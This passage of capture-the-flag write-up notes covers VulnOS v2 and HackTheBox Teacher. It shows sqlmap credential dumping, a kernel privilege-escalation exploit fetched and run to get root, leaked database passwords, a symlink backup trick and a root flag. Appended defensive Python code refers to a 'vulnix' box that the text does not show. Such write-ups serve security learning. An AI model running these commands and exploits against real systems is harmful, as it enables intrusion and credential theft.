Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 6667/tcp open irc Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds ``` ## 80 port - 看 icon 是 drupal,直接玩看看 CVE 囉 - cve-2018-7600 unexploitable - 一直失敗先放棄 - dirsearch ``` [00:31:38] 301 - 317B - /jabc/includes -> http://172.20.10.2/jabc/includes/ [00:31:38] 200 - 10KB - /jabc/includes/ [00:31:39] 200 - 9KB - /jabc/index.php [00:31:39] 200 - 3KB - /jabc/install.php [00:31:42] 301 - 313B - /jabc/misc -> http://172.20.10.2/jabc/misc/ [00:31:42] 301 - 316B - /jabc/modules -> http://172.20.10.2/jabc/modules/ [00:31:46] 301 - 317B - /jabc/profiles -> http://172.20.10.2/jabc/profiles/ [00:31:46] 200 - 743B - /jabc/profiles/standard/standard.info [00:31:46] 200 - 271B - /jabc/profiles/minimal/minimal.info [00:31:46] 200 - 278B - /jabc/profiles/testing/testing.info [00:31:47] 200 - 2KB - /jabc/robots.txt [00:31:48] 301 - 316B - /jabc/scripts -> http://172.20.10.2/jabc/scripts/ [00:31:48] 200 - 948B - /jabc/scripts/ [00:31:49] 301 - 314B - /jabc/sites -> http://172.20.10.2/jabc/sites/ [00:31:52] 301 - 318B - /jabc/templates -> http://172.20.10.2/jabc/templates/ [00:31:52] 200 - 975B - /jabc/templates/ [00:31:52] 301 - 315B - /jabc/themes -> http://172.20.10.2/jabc/themes/ [00:31:55] 200 - 42B - /jabc/xmlrpc.php ``` - documention 藏字 ``` Documentation ============= Dear customer, For security reasons, this section is hidden. For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest Thank you. 2019 © Vulnerable since 1980 Theme by [itapplication.net](http://itapplication.net). 
``` - http://172.20.10.2/jabcd0cs/ - opendocman - fuzzing - 登入後可以上傳檔案 - http://172.20.10.2/jabcd0cs/error.php?ec=13&last_message=%3Cimg%20src=x%3E - XSS ``` Current allowed filetypes: - image/gif - text/html - text/plain - application/pdf - image/pdf - application/x-pdf - application/msword - image/jpeg - image/pjpeg - image/png - application/msexcel - application/msaccess - text/richtxt - application/mspowerpoint - application/octet-stream - application/x-zip-compressed - application/zip - image/tiff - image/tif - application/vnd.ms-powerpoint - application/vnd.ms-excel - application/vnd.openxmlformats-officedocument.presentationml.presentation - application/vnd.openxmlformats-officedocument.wordprocessingml.document - application/vnd.openxmlformats-officedocument.spreadsheetml.sheet - application/vnd.oasis.opendocument.chart - application/vnd.oasis.opendocument.chart-template - application/vnd.oasis.opendocument.formula - application/vnd.oasis.opendocument.formula-template - application/vnd.oasis.opendocument.graphics - application/vnd.oasis.opendocument.graphics-template - application/vnd.oasis.opendocument.image - application/vnd.oasis.opendocument.image-template - application/vnd.oasis.opendocument.presentation - application/vnd.oasis.opendocument.presentation-template - application/vnd.oasis.opendocument.spreadsheet - application/vnd.oasis.opendocument.spreadsheet-template - application/vnd.oasis.opendocument.text - application/vnd.oasis.opendocument.text-master - application/vnd.oasis.opendocument.text-template - application/vnd.oasis.opendocument.text-web - text/csv - image/x-dwg - image/x-dfx - drawing/x-dwf - application/x-httpd-php - application/x-httpd-php5 ``` - php 欸 - 傳上去看看 - 不行 - 找看看 cve - https://www.exploit-db.com/exploits/32075 - sql injection ``` sqlmap -u "172.20.10.2/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --risk 3 --dbms=mysql -T odm_user --columns --dump Database: jabcd0cs Table: odm_user [3 entries] 
+----+--------------------+--------------------+--------------------+----------------------------------+--------------------+--------------------+------------+---------------+ | id | phone | Email | username | password | last_name | first_name | department | pw_reset_code | +----+--------------------+--------------------+--------------------+----------------------------------+--------------------+--------------------+------------+---------------+ | 1 | 5555551212 | webmin@example.com | webmin | b78aae356709f8c31118ea613980954b | min | web | 2 | <blank> | | 2 | 555 5555555 | guest@example.com | guest | 084e0343a0486ff05530df6c705c8bb4 | guest | guest | 2 | NULL | | 3 | <?php phpinfo();?> | asd@gmail.com | <?php phpinfo();?> | 4892e097d45fbe62fe5a9fe6c9836aaf | <?php phpinfo();?> | <?php phpinfo();?> | 2 | NULL | +----+--------------------+--------------------+--------------------+----------------------------------+--------------------+--------------------+------------+---------------+ 拿上網路爆一下 webmin/webmin1980 ``` - exploit - 登入,增加 `application/php` - 不行 - ssh - 直接登入啦! ## P1 -> root - `python -c 'import _pty_; _pty_.spawn("/bin/bash")'` - `find /etc -perm -2 ! -type l -ls 2>/dev/null` ``` webmin@VulnOSv2:~$ find /etc -perm -2 ! 
-type l -ls 2>/dev/null 639 4 drwxrwxrwx 4 root root 4096 Apr 16 2016 /etc/drupal/7/sites 646 4 -rwxrwxrwx 1 root www-data 576 Apr 16 2016 /etc/drupal/7/sites/default/dbconfig.php 642 20 -rwxrwxrwx 1 root root 18599 Jan 15 2014 /etc/drupal/7/sites/default/settings.php ``` - `uname -a` - Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux - https://raw.githubusercontent.com/SecWiki/linux-kernel-exploits/master/2015/CVE-2015-1328/37292.c ``` webmin@VulnOSv2:/tmp$ gcc 37292.c -o ofs webmin@VulnOSv2:/tmp$ ./ofs spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # id uid=0(root) gid=0(root) groups=0(root),1001(webmin) # whoami root ``` # HackTheBox - Teacher ## nmap ``` Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-28 16:22 CST Nmap scan report for 10.10.10.153 Host is up (0.29s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 40.83 seconds ``` - 80 port 而已 ## 80 port - dirsearch - 掃到有 moodle - 其他不重要 - http://10.10.10.153/gallery.html - 網頁註解很可疑 - 圖片有藏字 ``` Hi Servicedesk, I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha. Could you guys figure out what the last charachter is, or just reset it? 
Thanks, Giovanni ``` - 爆破密碼,intruder 爆破一下就出來了 - Giovanni/Th4C00lTheacha# - 成功登入 ## exploit - 查到這篇 exploit - https://blog.ripstech.com/2018/moodle-remote-code-execution/ - ez - ![](https://images.plurk.com/2Dh6d9aiau2GyxLLH47x5l.png) - config.php ``` <?php // Moodle configuration file unset($CFG); global $CFG; $CFG = new stdClass(); $CFG->dbtype = 'mariadb'; $CFG->dblibrary = 'native'; $CFG->dbhost = 'localhost'; $CFG->dbname = 'moodle'; $CFG->dbuser = 'root'; $CFG->dbpass = 'Welkom1!'; $CFG->prefix = 'mdl_'; $CFG->dboptions = array ( 'dbpersist' => 0, 'dbport' => 3306, 'dbsocket' => '', 'dbcollation' => 'utf8mb4_unicode_ci', ); $CFG->wwwroot = 'http://10.10.10.153/moodle'; $CFG->dataroot = '/var/www/moodledata'; $CFG->admin = 'admin'; $CFG->directorypermissions = 0777; require_once(__DIR__ . '/lib/setup.php'); // There is no php closing tag in this file, // it is intentional because it prevents trailing whitespace problems! ``` - 進去 db 撈密碼,這組很可疑 - Giovannibak | 7a860966115182402ed06375cf0a22af - expelled - 試試看登入該用戶 - 成功 ``` www-data@teacher:/var/www/html/moodle$ su giovanni su giovanni Password: expelled giovanni@teacher:/var/www/html/moodle$ ``` ## P1 -> root - `~/work/tmp` - 下面會幫你備份資料夾,而且是用 root 的權限備份 - 那我們就把備份的資料夾 link 到 /root - final exploit - `ln -s /root ../courses` - wait for backup - tar xvzf backup_courses.tar.gz - cat root.txt - 4f3a83b42ac7723a508b8ace7b8b1209 # Netmon - nmap ``` Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-02 21:16 CST Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 0.90% done Nmap scan report for 10.10.10.152 Host is up (0.26s latency). Not shown: 995 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds Nmap done: 1 IP address (1 host up) scanned in 18.22 seconds ```
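Looking back at the vulnix `/etc/exports` edit: the whole escalation rests on a wildcard export with `no_root_squash`, so a defender wants that file audited after every `sudoedit`. The checker below is an added example, not part of the original write-up; `SAMPLE_EXPORTS` is a constructed file that mirrors the export on the box, and the hardened `172.20.10.0/28` entry is an assumption.

```python
import re
from typing import List, Tuple

# Constructed sample: the export as edited on vulnix, plus a hardened entry
# (restricted subnet, root_squash kept) of the kind the box should have had.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
#       to NFS clients.  See exports(5).
/home/vulnix *(rw,no_root_squash)
/srv/share 172.20.10.0/28(rw,sync,root_squash,no_subtree_check)
"""

# "<host>(opt,opt)" or a bare "<host>"; a bare "(opts)" token applies to everyone
CLIENT_RE = re.compile(r"(?P<host>[^\s(]*)(?:\((?P<opts>[^)]*)\))?")

def parse_exports(text: str) -> List[Tuple[str, List[Tuple[str, List[str]]]]]:
    """Parse exports(5) lines into (path, [(client, [options]), ...])."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # strip comments and blanks
        if not line:
            continue
        path, *tokens = line.split()
        clients = []
        for tok in tokens:
            m = CLIENT_RE.fullmatch(tok)
            if m is None:
                raise ValueError(f"malformed client entry: {tok!r}")
            host = m.group("host") or "*"         # "(rw)" alone means every host
            opts = [o for o in (m.group("opts") or "").split(",") if o]
            clients.append((host, opts))
        exports.append((path, clients))
    return exports

def audit_exports(text: str) -> List[Tuple[str, str, str]]:
    """Return (path, client, issue) for every export setting that lets an NFS
    client turn share access into root on the server, as happened on vulnix."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            if "no_root_squash" in opts:
                # client uid 0 stays uid 0: a setuid-root bash can be planted
                findings.append((path, host, "no_root_squash"))
            if host == "*":
                # any host that can reach the server may mount the share
                findings.append((path, host, "wildcard_host"))
            if "insecure" in opts:
                # requests from unprivileged client ports are accepted
                findings.append((path, host, "insecure"))
    return findings
```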
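For the Teacher backup job above, the defender-side fix is a root backup routine that refuses a symlinked source and never follows links inside it. This is an added example, not the box's own cron script: `safe_backup` is a hypothetical name, and the directory tree built in `build_demo_tree` is constructed to mirror the `work/courses` layout.

```python
import os
import tarfile
import tempfile

def safe_backup(src_dir, allowed_root, out_tar):
    """Archive src_dir only if it really lives under allowed_root; symlinks are
    dropped rather than followed, so a planted `ln -s /root courses` yields nothing."""
    real_src = os.path.realpath(src_dir)
    real_root = os.path.realpath(allowed_root)
    if os.path.islink(src_dir) or not real_src.startswith(real_root + os.sep):
        raise ValueError(f"refusing {src_dir}: resolves to {real_src}")
    archived = []
    def keep(info):
        if info.issym() or info.islnk():   # drop links entirely
            return None
        archived.append(info.name)
        return info

    with tarfile.open(out_tar, "w:gz") as tar:
        # tarfile lstat()s by default, so link targets are never read
        tar.add(src_dir, arcname=os.path.basename(src_dir), filter=keep)
    return archived

def build_demo_tree():
    """Constructed layout mirroring the Teacher box: work/courses is what the
    root cron job backs up; work/evil is the attacker's planted link."""
    base = tempfile.mkdtemp()
    work, outside = os.path.join(base, "work"), os.path.join(base, "outside")
    os.makedirs(os.path.join(work, "courses"))
    os.makedirs(os.path.join(work, "tmp"))
    os.makedirs(outside)                               # stands in for /root
    with open(os.path.join(outside, "root.txt"), "w") as fh:
        fh.write("flag-placeholder\n")
    with open(os.path.join(work, "courses", "notes.txt"), "w") as fh:
        fh.write("lecture notes\n")
    os.symlink(outside, os.path.join(work, "evil"))
    os.symlink(os.path.join(outside, "root.txt"),
               os.path.join(work, "courses", "link"))
    return work

def demo():
    """Back up the real directory, then try the planted symlink."""
    work = build_demo_tree()
    out = os.path.join(work, "tmp", "backup_courses.tar.gz")
    good = safe_backup(os.path.join(work, "courses"), work, out)
    try:
        safe_backup(os.path.join(work, "evil"), work, out)
        return good, False
    except ValueError:
        return good, True
```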